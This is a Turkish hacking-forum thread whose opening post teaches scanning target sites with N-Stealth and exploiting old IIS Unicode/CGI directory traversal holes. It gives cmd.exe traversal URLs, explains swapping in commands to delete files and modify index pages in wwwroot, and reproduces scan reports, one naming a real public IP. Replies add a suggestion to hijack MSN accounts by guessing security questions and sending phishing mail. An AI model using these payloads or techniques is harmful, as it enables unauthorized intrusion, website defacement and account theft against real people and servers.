En Cok Kullanılan Web Hack Tekniği

blackwolf

uid=0(root)
Katılım
17 Ağu 2005
Mesajlar
1,429
Reaction score
0
Puanları
0
Yaş
35
En Çok Kullanılan Web Hack i

Dünyada En Çok Kullanilan Web Hack Teknigi Cgi ve Uni cod Açiklaridir,

Cgi ve Uni Cod Açiklarindan en iyi Seklilde Faydalanmak için Scannerinizin iyi Olmasi Gerek.

Yoksa Piyasada Bir çok cgi scan var, Zamaninda Hepside çok iyi di. Veritabanlarını Güncelleştirmeyen Scannerlar yeni açıklar karşında hiçte etkili olmayacaktır.

ve Açik Olmadigi Halde Basit Bir Logi Sayfasi Hakkinda açik var diye uyari Veriyorlar.

Tüm

Su An Piyasadaki En iyi Cgi Sanner N-Stealth (iP Portal Download Bölümden indirebilirsiniz)

Program Güzel Oldugu Kadar Türkçe Dil Destegininde Bulunmasi Arti Bir Özellik.

Simdi Adim Adim Bir Sisteme UniCod Açiklari Sayesinde Sizmayi Görecegiz.

Programi Kurduktan Sonra Dil Seçenekleri Çikacak Karsiniza Ordan Türkçeyi Seçin




Sunucu iP Adresi : Buraya Saldiracagimiz Hedef Sitenin ip Adresini Yaziyoruz.

(ip Adresini ögrenmek için siteye ping atin yeter c:>ping -t gibi illegalport.com ip adresi 66.111.48.66 )

ip Adresini Yazdiktan Sonra Tara Tusuna tiklamaniz yada Entera Basmaniz Yeterli.

Baglanti Hiziniza Bagli Olarak islem Biraz Sürecektir. (öneri olarak: önce Local Networkünüzde Deneyebilirsiniz.

Tabiki Networkünüzdeki (Saldiracaginiz Makinada) Web Server Kurulu Olmali.

Bu Sekilde Sistemin isleyisini çok daha hizli görebilirsiniz.)



N-Stealth Bir Açik Buldugu Anda üstteki Gibi Muhtemel Yazlim Hatasi Bulundu diye bir uyari verecektir.

Hemen Sag Taraftaki Yeri Butonuna Tiklayarak Açigi Görebilirsiniz. Ama En iyisi Sonuna Kadar Beklemek.



Tarama Islemi Bittiginde Sistem Otomatik Olarak Size Html Formatinda Rapor Olusturacaktir.

Bu Raporun örnegini asagida görebilirsiniz.

Raporu html olarak Kaydedin.

Rapor Türkçedir ve Sistemdeki Açiklari, Risk Seviyelerini Size Gösterecektir.

ve html dosyasindan Direkt Çalistirabilmeniz için Hazir Linkler Olusturacaktir.



html olarak internet Explorerdan oldugu gibi. Direk Program üzerinden de

bu açiklari Açik Butonuna Tiklayarak çalistirabilirsiniz.






Simdi En Can Alici Nokta : http://10.0.0.8/msadc/..%c0%af..%c0%af.....d.exe?/c+dir+c:

(Bu Açiga Ait Bir Link)

Link in Sonunda +dir+c: bölümü var bütün is burda. dir yazan yere cdm.exe nin çalistirdigi tüm komutlari yazabilirsiniz.

Mesela Dizin Olusturmak için +md+c:dizinAdi

Dosya Silmek için +del+c:dosya adi

Diznler Arasi Geçis için Bildigimiz cd Komutunu kullanabiliriz +cd+c:Inetpubwwroot

wwroot a ulastikdan sonra index.htm - index.asp ye istediginizi yapin.

iste Örnek Bir N-Stealth Raporu

Default Kurulan Tüm IISlerde Bu Açiklar Var.

Raporda Risk Seviyeleri Belirtilmistir.


Rapor

Rapor XXXX (1X0.X0.0.XX
Tarih: 02.03.2003 19:04:14

Tarama kurallari: Normal

10.0.0.8
Sunumcu adi: XXXXX
Port: 80
Sunumcu: Microsoft-IIS/5.0

Sunumcu CGI aciklarina sahip olabilir. 160 item(s)

Special Request
Risk seviyesi: Alcak
Yeri: http://10.0.0.8/<script>alertCan ...script>.shtml

Cross-Site Scripting Vulnerability.


BLABLA Test
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/blabla.idq
SANS/FBI Top 20*

Possible Vulnerable ISAPI Extension



Special Request
Risk seviyesi: Orta
Yeri: http://10.0.0.8/null.htw?CiWebHitsFile=/...HiliteType=Full

Common Vulnerability/Exposure.


Special Request
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/msadc/..%5c..%5c..%2.../cmd.exe?/c+dir

IIS CGI Decode Vulnerability.


Special Request
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/scripts/..%2f..%2f...../cmd.exe?/c+dir

IIS CGI Decode Vulnerability.


Special Request
MS IIS/PWS Escaped Characters Decoding Command Execution

CVE: CAN-2001-0333
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/scripts/..%5c..%5CWi...d.exe?/c+dir+c:
BugTraq ID: 2708

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and characters twice.



Special Request
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/msadc/..%2f..%2f..%2...d.exe?/c+dir+c:

IIS Unicode Vulnerability.



Special Request
MS IIS/PWS Escaped Characters Decoding Command Execution

CVE: CAN-2001-0333
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/msadc/..%5c../..%5c....d.exe?/c+dir+c:
BugTraq ID: 2708

IIS Unicode Vulnerability.


Special Request
Risk seviyesi: Yuksek
Yeri: http://10.0.0.8/msadc/..%c0%af..%c0%af.....d.exe?/c+dir+c:

IIS Unicode Vulnerability.


N-Stealth 3.7 (Build 67)
 
arkadaş döküman güzel ama maalesef eksik almışsın.Orda eğer okuduysan dökümanı ki ben sanmıyorum okuduğunu aşağıdaki resimde veya üstteki resmde gibi terimler kullanılmış.Ama ben resim falan görmüyoruum herneyse paylaşım güzel eline sağlık.
 
arkadaşım bu sitede arama yaptırdım ve bunları buldum şimdi ne yapmam gerekiyor bi daha açıklarmısın

Rapor
Rapor - (212.227.127.82)
Tarih: 19.08.2005 09:02:25

Tarama kurallari: Normal

212.227.127.82
Sunumcu adi: -
Port: 80
Sunumcu: Apache/1.3.33 (Unix)

Sunumcu CGI aciklarina sahip olabilir. 2 item(s)

GLOBAL Test
Risk seviyesi: Orta
Yeri: http://212.227.127.82/global.asa

Common Vulnerability/Exposure.


PASSWD Test
Risk seviyesi: Yuksek
Yeri: http://212.227.127.82/piranha/secure/passwd.php3


N-Stealth 3.5 Build 62
 
BİR BAŞKA SİTEDE İSE BÖYLE BİR RAPOR VERDE



Sunumcu adi: -
Port: 80
Sunumcu: Unknown Server

Yazilim hatasi bulunamadi.

N-Stealth 3.5 Build 62
BU NEDEMEK YANİ BU SİTENİN ACIGI YOKMU
 
LinkLeri DuzeLtmessen k0nuyu siLiyorum...

Serperi Pespese mesaj yazmak yasak arkadasim.. orada "DuzeLt" butonu war.. onu kuLLanirsan daha iyi oLur.. k0Lay geLsin...
 
agalar bana kolay bi msn hack yontemı soleyın sımdı acele lasım sımıden tesekkur ederım.a.q
 
gizli soru tahhmin et karsıdakini tanıorsan ha bidem fake mail yollla belki yutar
 
saol güzel anlatmışsın .. ben yeniyim bu işlerde, bulunan açıktan sitenin index ine müdahale edebilmemiz için mutlaka uzantının sonunun exe mi olması lazım yada c+dır mı olması lazım . cevaplarsan sevinirim...
 
arkadaş öyle birşey yok.senin dediğin gibi yani...N-Stealth Security Scanner bu programla açıkları taratırsın daha sonra bulduğun açığa göre müdahale edersin.burda anlatılan sadece bir açık için olanı.bulduğun açığa göre değişir yapacağın işlem.Bulduğun açığı securityfocus veya olympus gibi sitelerde aratırsın orda detayını bulursun.kolay gelsin
 
unicode a hiç kasmayın bence :)
 
Geri
Üst